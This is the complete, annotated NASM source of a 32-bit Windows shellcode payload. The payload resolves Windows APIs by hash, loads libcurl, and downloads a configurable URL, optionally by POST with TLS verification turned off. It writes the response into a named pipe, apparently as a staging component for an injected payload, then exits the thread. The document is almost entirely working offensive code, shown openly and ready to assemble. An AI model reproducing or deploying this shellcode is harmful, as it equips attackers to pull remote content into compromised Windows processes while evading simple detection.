LibCurl Pipe Shellcode Win32
; LibCurl pipe shellcode (Win32, NASM, 32-bit, position independent).
; Flow: open the named pipe szPipeName with CreateFileA, LoadLibraryA("libcurl.dll"),
; resolve five curl_* entry points with GetProcAddress, fetch server_url (POSTing
; post_params when it is non-empty), stream the response body into the pipe through
; the start_pipe write callback, then end the current thread with RtlExitUserThread.
; Windows APIs are reached through the included block_api32 resolver: push the
; arguments, push the API hash, `call ebp`. libcurl functions are called through
; function-pointer slots kept on the stack and addressed relative to esi.
;
; Stack-slot map (esi = esp at entry; control never returns, registers are not preserved):
;   [esi]     hModuleLibcurl      (this dword sits at the entry-time esp itself,
;                                  i.e. just above the 0x2000 reserve, not inside it)
;   [esi-4]   curl_global_init
;   [esi-8]   curl_easy_init
;   [esi-12]  curl_easy_setopt
;   [esi-16]  curl_easy_perform
;   [esi-20]  curl_easy_cleanup
;   [esi-24]  CURL *curl
;   [esi-28]  hFile (pipe handle)
;   [esi-32]  address of the block_api32 resolver (ebp), reused by start_pipe
%define u(x) __utf16__(x)              ; UTF-16 literal helper; not used in the code visible here
[BITS 32]
[ORG 0]
cld                                    ; DF = 0 so string instructions move forward (the included resolver is not shown here)
mov esi, esp ; ESI points to the current position of the stack (base for the local-variable slots above)
sub esp, 0x2000 ; Reserve scratch space on the stack below the variable slots
call start                             ; pushes the address of 'delta' (popped into ebp by start) and jumps over the resolver
delta:
%include "block_api32.asm"             ; API-by-hash resolver; entered with `call ebp` (hash on top of the pushed arguments)
start:
pop ebp                                ; ebp = runtime address of 'delta': PIC base for data and entry of the resolver
mov dword [esi-32], ebp ; saved for start_pipe, which reaches the resolver through its userdata pointer
; hFile = CreateFileA(szPipeName, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL)
; Share mode 0 and OPEN_EXISTING: a server end of the pipe must already exist.
xor eax, eax
push eax                               ; hTemplateFile = NULL
push eax                               ; dwFlagsAndAttributes = 0
push 0x03 ; OPEN_EXISTING
push eax                               ; lpSecurityAttributes = NULL
push eax                               ; dwShareMode = 0
push 0x40000000 ; GENERIC_WRITE
lea ecx, [ebp+szPipeName-delta]        ; PIC address of the pipe name
push ecx ; \\.\pipe\foo
push 0x4FDAF6DA ; CreateFileA
call ebp
xor ecx, ecx ; check for errors...
sub ecx, 1                             ; ecx = -1 (INVALID_HANDLE_VALUE)
cmp eax, ecx
je error_found ; INVALID_HANDLE_VALUE = -1
mov dword [esi-28], eax ; [esi-28] => hFile (never closed: the exit path below does not call CloseHandle)
; hModuleLibcurl = LoadLibraryA("libcurl.dll")
lea eax, [ebp+szLibcurl-delta]
push eax
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA("libcurl.dll");
test eax, eax ; make sure libcurl.dll can be found
jz error_found
mov dword [esi], eax ; [esi-0] => hModuleLibcurl
; Resolve the five libcurl entry points with GetProcAddress(hModuleLibcurl, name).
; None of the results is NULL-checked; a missing export is only noticed when it is called.
lea ecx, [ebp+szCurlGlobalInit-delta]
push ecx
mov edx, [esi] ; hModuleLibcurl
push edx
push 0x7802F749 ; hash( "kernel32.dll", "GetProcAddress" )
call ebp ; GetProcAddress(hModuleLibcurl, szCurlGlobalInit);
mov dword [esi-4], eax ; [esi-4] => curl_global_init
lea ecx, [ebp+szCurlEasyInit-delta]
push ecx
mov edx, [esi] ; hModuleLibcurl
push edx
push 0x7802F749 ; hash( "kernel32.dll", "GetProcAddress" )
call ebp ; GetProcAddress(hModuleLibcurl, szCurlEasyInit);
mov dword [esi-8], eax ; [esi-8] => curl_easy_init
lea ecx, [ebp+szCurlEasySetopt-delta]
push ecx
mov edx, [esi] ; hModuleLibcurl
push edx
push 0x7802F749 ; hash( "kernel32.dll", "GetProcAddress" )
call ebp ; GetProcAddress(hModuleLibcurl, szCurlEasySetopt);
mov dword [esi-12], eax ; [esi-12] => curl_easy_setopt
lea ecx, [ebp+szCurlEasyPerform-delta]
push ecx
mov edx, [esi] ; hModuleLibcurl
push edx
push 0x7802F749 ; hash( "kernel32.dll", "GetProcAddress" )
call ebp ; GetProcAddress(hModuleLibcurl, szCurlEasyPerform);
mov dword [esi-16], eax ; [esi-16] => curl_easy_perform
lea ecx, [ebp+szCurlEasyCleanup-delta]
push ecx
mov edx, [esi] ; hModuleLibcurl
push edx
push 0x7802F749 ; hash( "kernel32.dll", "GetProcAddress" )
call ebp ; GetProcAddress(hModuleLibcurl, szCurlEasyCleanup);
mov dword [esi-20], eax ; [esi-20] => curl_easy_cleanup
; libcurl calls are cdecl; the pushed arguments are never popped after any call below,
; so esp only drifts downward. All locals are addressed via esi and the thread exits
; at error_found, which is why the drift goes unnoticed here.
push 0x3 ; (CURL_GLOBAL_WIN32 | CURL_GLOBAL_SSL)
call dword [esi-4] ; curl_global_init  -- its CURLcode result is not checked
call dword [esi-8] ; curl_easy_init
mov dword [esi-24], eax ; [esi-24] => CURL *curl
test eax, eax ; make sure curl is loaded
jz error_found
; POST only when post_params starts with a non-zero byte.
lea ecx, [ebp+post_params-delta]
xor ebx, ebx
mov bl, byte [ecx]                     ; ebx = zero-extended first byte of post_params
test ebx, ebx ; test first byte of post_params
jz skip_post ; to see if we are making a post req
push ecx ; post_params
push 10015 ; CURLOPT: CURLOPT_POSTFIELDS
mov edx, dword [esi-24] ; *curl
push edx
call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_POSTFIELDS, post_params );
skip_post:
lea ecx, [ebp+server_url-delta]
push ecx ; URL
push 10002 ; CURLOPT: CURLOPT_URL
mov edx, dword [esi-24] ; *curl
push edx
call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_URL, URL );
lea ecx, [ebp+start_pipe-delta]        ; PIC address of the write callback defined below
push ecx ; write_data
push 20011 ; CURLOPT: CURLOPT_WRITEFUNCTION
mov edx, dword [esi-24] ; *curl
push edx
call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_WRITEFUNCTION, write_data );
push esi ; pointer to variables: start_pipe reads hFile at [esi-28] and the resolver at [esi-32]
push 10001 ; CURLOPT: CURLOPT_WRITEDATA
mov edx, dword [esi-24] ; *curl
push edx
call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_WRITEDATA, pVariables );
; Certificate and hostname verification are both switched off, so an https URL would
; accept any server certificate.
xor ecx, ecx
push ecx ; 0L
push 64 ; CURLOPT: CURLOPT_SSL_VERIFYPEER
mov edx, dword [esi-24] ; *curl
push edx
call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_SSL_VERIFYPEER, 0L );
xor ecx, ecx
push ecx ; 0L
push 81 ; CURLOPT: CURLOPT_SSL_VERIFYHOST
mov edx, dword [esi-24] ; *curl
push edx
call dword [esi-12] ; curl_easy_setopt( curl, CURLOPT_SSL_VERIFYHOST, 0L );
mov edx, dword [esi-24] ; *curl
push edx
call dword [esi-16] ; curl_easy_perform(curl); -- blocks until the transfer ends; result not checked
mov edx, dword [esi-24] ; *curl
push edx
call dword [esi-20] ; curl_easy_cleanup(curl); (no curl_global_cleanup, no CloseHandle on hFile)
error_found:
; Reached on every failure path and after normal completion.
push byte 0 ; push the exit function parameter
push 0x6F721347 ; ntdll.dll!RtlExitUserThread
call ebp ; call EXITFUNK( 0 ); -- ends only the current thread
start_pipe:
; libcurl CURLOPT_WRITEFUNCTION callback (cdecl), installed by 'start':
;   size_t start_pipe(char *ptr, size_t size, size_t nmemb, void *userdata)
;   [ebp+8]  = ptr     (source buffer)
;   [ebp+12] = size
;   [ebp+16] = nmemb
;   [ebp+20] = userdata = the esi block from 'start' (hFile at -28, resolver at -32)
; Writes size*nmemb bytes to the pipe with WriteFile and returns dwBytesWritten in eax.
; Per the libcurl contract a return value different from size*nmemb aborts the
; transfer, so a short pipe write ends the download. WriteFile's BOOL result is ignored.
push ebp
mov ebp, esp
sub esp, 8                             ; locals: [ebp-4] = dwBytesWritten ([ebp-8] is unused)
push edi
push esi
push ebx
push edx                               ; edx is caller-saved under cdecl; saving it is harmless
xor eax, eax
mov dword [ebp-4], eax                 ; dwBytesWritten = 0
lea edi, [ebp-4] ; edi = &dwBytesWritten
mov eax, dword [ebp+20]                ; eax = userdata (the esi block)
mov ebx, dword [eax-28] ; save hFile in ebx
mov esi, dword [ebp+8] ; buffer
mov eax, dword [ebp+12] ; size
mov ecx, dword [ebp+16] ; nmemb
mul ecx ; eax = size * nmemb (high dword lands in edx and is discarded; edx is restored below)
; WriteFile(hFile, buffer, size*nmemb, &dwBytesWritten, NULL)
xor ecx, ecx
push ecx ; NULL lpOverlapped
push edi ; &dwBytesWritten
push eax ; buffer size
push esi ; source buffer
push ebx ; hFile
push 0x5BAE572D ; WriteFile
mov eax, dword [ebp+20]
call dword [eax-32] ; block_api32 resolver saved by 'start' at [esi-32]
mov eax, dword [edi] ; return dwBytesWritten
pop edx
pop ebx
pop esi
pop edi
mov esp, ebp
pop ebp
ret                                    ; cdecl: libcurl pops the four arguments
; Data area, addressed as [ebp + label - delta] from the code above.
szPipeName:
db '\\.\pipe\foo', 0                   ; named pipe opened for GENERIC_WRITE by 'start'
times 4 db 0                           ; padding
szLibcurl:
db 'libcurl.dll', 0                    ; module name passed to LoadLibraryA
; Export names passed to GetProcAddress, in the order they are resolved.
szCurlGlobalInit:
db 'curl_global_init', 0
szCurlEasyInit:
db 'curl_easy_init', 0
szCurlEasySetopt:
db 'curl_easy_setopt', 0
szCurlEasyPerform:
db 'curl_easy_perform', 0
szCurlEasyCleanup:
db 'curl_easy_cleanup', 0
server_url:
db 'http://www.google.ca/s?q=lolcat', 0 ; CURLOPT_URL; plain http here (the SSL_VERIFY* settings only matter for https)
times 32 db 0                          ; padding after the URL; presumably slack for a longer string - TODO confirm
post_params:
db 0                                   ; first byte 0 => no POST; a non-empty string here becomes CURLOPT_POSTFIELDS